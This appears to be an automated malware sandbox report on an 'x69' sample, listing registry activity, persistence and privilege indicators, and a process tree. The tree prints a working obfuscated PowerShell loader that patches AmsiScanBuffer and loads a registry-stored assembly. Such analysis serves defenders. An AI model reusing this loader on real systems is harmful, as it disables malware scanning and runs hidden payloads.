Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "8324" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "8324" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e0eb78c-c95d-4bdc- = (binary value removed) RuntimeBroker.exe
Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- RuntimeBroker.exe
Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = 9fdb082203c9db01 RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = (binary value removed) RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "0" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = 11730a2103c9db01 RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "0" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = 4503122103c9db01 RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d26d7b446d0f524944971d3c0d8af90972cfbf805a5983fe05dc7687bed197cc" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = "0" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = "8324" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = (binary value removed) RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = 3ee82b2103c9db01 RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = (binary value removed) RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b1f7ea5645e0dd8d96ad14dd6b470e9f01729817c174c333915df368649e3f60" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = 62cd272103c9db01 RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "8324" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d26d7b446d0f524944971d3c0d8af90972cfbf805a5983fe05dc7687bed197cc" RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "0" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4c367a787e45e8c0925f73cea7c418e5e8dafb2501d5efda2f09a9254577958c" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3708 schtasks.exe 2412 schtasks.exe 4840 schtasks.exe 1888 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 980 x69.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3956 powershell.exe 3956 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 4172 powershell.exe 4172 powershell.exe 4172 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 2580 powershell.exe 2580 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 2580 powershell.exe 4824 powershell.exe 4824 powershell.exe 4824 powershell.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 4092 powershell.EXE 4092 powershell.EXE 4092 powershell.EXE 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3176 powershell.exe 3176 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 3176 powershell.exe 2840 powershell.exe 2840 powershell.exe 3400 powershell.exe 3400 powershell.exe 3400 powershell.exe 2840 powershell.exe 3192 powershell.exe 3192 powershell.exe 3192 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 4148 powershell.exe 4148 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3412 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeDebugPrivilege 4904 x69.exe
Token: SeDebugPrivilege 3956 powershell.exe
Token: SeDebugPrivilege 980 x69.exe
Token: SeDebugPrivilege 4556 x69.exe
Token: SeDebugPrivilege 2580 powershell.exe
Token: SeDebugPrivilege 4172 powershell.exe
Token: SeDebugPrivilege 3708 powershell.exe
Token: SeDebugPrivilege 3264 powershell.exe
Token: SeDebugPrivilege 2580 powershell.exe
Token: SeDebugPrivilege 4148 powershell.exe
Token: SeDebugPrivilege 4824 powershell.exe
Token: SeDebugPrivilege 4692 powershell.exe
Token: SeDebugPrivilege 4092 powershell.EXE
Token: SeDebugPrivilege 3908 powershell.exe
Token: SeDebugPrivilege 1444 powershell.exe
Token: SeDebugPrivilege 3176 powershell.exe
Token: SeDebugPrivilege 3400 powershell.exe
Token: SeDebugPrivilege 2840 powershell.exe
Token: SeDebugPrivilege 3192 powershell.exe
Token: SeDebugPrivilege 2580 powershell.exe
Token: SeDebugPrivilege 1432 powershell.exe
Token: SeDebugPrivilege 3572 powershell.exe
Token: SeDebugPrivilege 2424 powershell.exe
Token: SeDebugPrivilege 980 x69.exe
Token: SeDebugPrivilege 4148 powershell.exe
Token: SeDebugPrivilege 3596 powershell.exe
Token: SeDebugPrivilege 4080 powershell.exe
Token: SeDebugPrivilege 2412 powershell.exe
Token: SeDebugPrivilege 3972 powershell.exe
Token: SeDebugPrivilege 844 powershell.exe
Token: SeDebugPrivilege 4148 powershell.exe
Token: SeDebugPrivilege 216 powershell.exe
Token: SeDebugPrivilege 4056 powershell.exe
Token: SeDebugPrivilege 3400 powershell.exe
Token: SeDebugPrivilege 4148 powershell.exe
Token: SeDebugPrivilege 4080 powershell.exe
Token: SeDebugPrivilege 4088 powershell.exe
Token: SeDebugPrivilege 1444 powershell.exe
Token: SeDebugPrivilege 4828 powershell.exe
Token: SeDebugPrivilege 4436 powershell.exe
Token: SeDebugPrivilege 1700 powershell.exe
Token: SeDebugPrivilege 1432 powershell.exe
Token: SeDebugPrivilege 5032 powershell.exe
Token: SeDebugPrivilege 3984 powershell.exe
Token: SeDebugPrivilege 4308 powershell.exe
Token: SeDebugPrivilege 3756 powershell.exe
Token: SeDebugPrivilege 1560 powershell.exe
Token: SeDebugPrivilege 4092 powershell.EXE
Token: SeDebugPrivilege 3508 dllhost.exe
Token: SeDebugPrivilege 4600 x69.exe
Token: SeAuditPrivilege 2716 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 1912 svchost.exe
Token: SeIncreaseQuotaPrivilege 1912 svchost.exe
Token: SeSecurityPrivilege 1912 svchost.exe
Token: SeTakeOwnershipPrivilege 1912 svchost.exe
Token: SeLoadDriverPrivilege 1912 svchost.exe
Token: SeSystemtimePrivilege 1912 svchost.exe
Token: SeBackupPrivilege 1912 svchost.exe
Token: SeRestorePrivilege 1912 svchost.exe
Token: SeShutdownPrivilege 1912 svchost.exe
Token: SeSystemEnvironmentPrivilege 1912 svchost.exe
Token: SeUndockPrivilege 1912 svchost.exe
Token: SeManageVolumePrivilege 1912 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 1912 svchost.exe
-
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 3412 Explorer.EXE 3412 Explorer.EXE -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 4904 wrote to memory of 3956 4904 x69.exe 93
PID 4904 wrote to memory of 3956 4904 x69.exe 93
PID 4904 wrote to memory of 3708 4904 x69.exe 121
PID 4904 wrote to memory of 3708 4904 x69.exe 121
PID 2976 wrote to memory of 980 2976 cmd.exe 101
PID 2976 wrote to memory of 980 2976 cmd.exe 101
PID 4904 wrote to memory of 4556 4904 x69.exe 102
PID 4904 wrote to memory of 4556 4904 x69.exe 102
PID 4904 wrote to memory of 2580 4904 x69.exe 123
PID 4904 wrote to memory of 2580 4904 x69.exe 123
PID 4904 wrote to memory of 2412 4904 x69.exe 106
PID 4904 wrote to memory of 2412 4904 x69.exe 106
PID 4904 wrote to memory of 2612 4904 x69.exe 110
PID 4904 wrote to memory of 2612 4904 x69.exe 110
PID 4904 wrote to memory of 2612 4904 x69.exe 110
PID 4904 wrote to memory of 4172 4904 x69.exe 111
PID 4904 wrote to memory of 4172 4904 x69.exe 111
PID 1520 wrote to memory of 3432 1520 cmd.exe 113
PID 1520 wrote to memory of 3432 1520 cmd.exe 113
PID 1520 wrote to memory of 3432 1520 cmd.exe 113
PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114
PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114
PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114
PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115
PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115
PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115
PID 3432 wrote to memory of 3408 3432 x69Disable-winDefender.exe 116
PID 3432 wrote to memory of 3408 3432 x69Disable-winDefender.exe 116
PID 2612 wrote to memory of 1156 2612 x69Disable-winDefender.exe 118
PID 2612 wrote to memory of 1156 2612 x69Disable-winDefender.exe 118
PID 3408 wrote to memory of 3708 3408 cmd.exe 121
PID 3408 wrote to memory of 3708 3408 cmd.exe 121
PID 1156 wrote to memory of 3264 1156 cmd.exe 122
PID 1156 wrote to memory of 3264 1156 cmd.exe 122
PID 3408 wrote to memory of 2580 3408 cmd.exe 148
PID 3408 wrote to memory of 2580 3408 cmd.exe 148
PID 4904 wrote to memory of 4840 4904 x69.exe 124
PID 4904 wrote to memory of 4840 4904 x69.exe 124
PID 1156 wrote to memory of 4148 1156 cmd.exe 165
PID 1156 wrote to memory of 4148 1156 cmd.exe 165
PID 4904 wrote to memory of 1864 4904 x69.exe 128
PID 4904 wrote to memory of 1864 4904 x69.exe 128
PID 4904 wrote to memory of 1864 4904 x69.exe 128
PID 1864 wrote to memory of 2864 1864 x69install.exe 130
PID 1864 wrote to memory of 2864 1864 x69install.exe 130
PID 1864 wrote to memory of 2864 1864 x69install.exe 130
PID 4016 wrote to memory of 3136 4016 cmd.exe 132
PID 4016 wrote to memory of 3136 4016 cmd.exe 132
PID 4016 wrote to memory of 3136 4016 cmd.exe 132
PID 1156 wrote to memory of 4824 1156 cmd.exe 135
PID 1156 wrote to memory of 4824 1156 cmd.exe 135
PID 3408 wrote to memory of 4692 3408 cmd.exe 227
PID 3408 wrote to memory of 4692 3408 cmd.exe 227
PID 1156 wrote to memory of 3908 1156 cmd.exe 221
PID 1156 wrote to memory of 3908 1156 cmd.exe 221
PID 980 wrote to memory of 3176 980 x69.exe 139
PID 980 wrote to memory of 3176 980 x69.exe 139
PID 3408 wrote to memory of 1444 3408 cmd.exe 168
PID 3408 wrote to memory of 1444 3408 cmd.exe 168
PID 980 wrote to memory of 2840 980 x69.exe 142
PID 980 wrote to memory of 2840 980 x69.exe 142
PID 1156 wrote to memory of 3400 1156 cmd.exe 228
PID 1156 wrote to memory of 3400 1156 cmd.exe 228
PID 3408 wrote to memory of 3192 3408 cmd.exe 145
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4e50d135-7a6d-4d0f-a5bc-ef624923cc50}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1204 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:soqzriFICKPX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IWGxBxzgptDfOy,[Parameter(Position=1)][Type]$rHbiIemdzf)$pCFXamWdnuY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+'ass,'+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pCFXamWdnuY.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+'c'+'i'+'a'+''+'l'+'Na'+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',Pub'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$pCFXamWdnuY.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$rHbiIemdzf,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $pCFXamWdnuY.CreateType();}$IQgCZHrUAgeOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'iv'+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'ods');$lGFXxxMfZrJrUx=$IQgCZHrUAgeOB.GetMethod(''+'G'+'e'+[Char](116)+'P'+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+'ta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lMUowgDplkGbOCaSZHX=soqzriFICKPX @([String])([IntPtr]);$IJcTzqqwsXVuxeflbOdmSz=soqzriFICKPX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YOrndKdnUVj=$IQgCZHrUAgeOB.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+'le').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2.'+[Char](100)+'l'+'l'+'')));$oTZslXcysVUokr=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+'a'+'r'+'y'+[Char](65)+'')));$AooJiHWKjhuquyQjE=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$AaJSPUX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oTZslXcysVUokr,$lMUowgDplkGbOCaSZHX).Invoke('a'+'m'+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$DmUKzttPSgYIwmfuP=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$AaJSPUX,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'fer')));$egDyXnxAlh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,4,[ref]$egDyXnxAlh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DmUKzttPSgYIwmfuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,0x20,[ref]$egDyXnxAlh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue('x'+'6'+'9'+'s'+''+'t'+'a'+'g'